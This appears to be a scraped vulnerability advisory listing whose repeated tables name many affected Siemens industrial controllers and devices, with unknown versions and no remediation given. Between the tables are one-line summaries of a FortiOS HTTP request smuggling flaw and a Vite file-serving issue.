vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
An HTTP request smuggling vulnerability in Fortinet FortiOS allows unauthenticated attackers to bypass firewall policies by sending specially crafted headers, potentially compromising security.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Certain Vite applications allowed files in the public directory to be served without following `server.fs` settings, particularly when exposed to the network, with specific versions addressing this issue.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
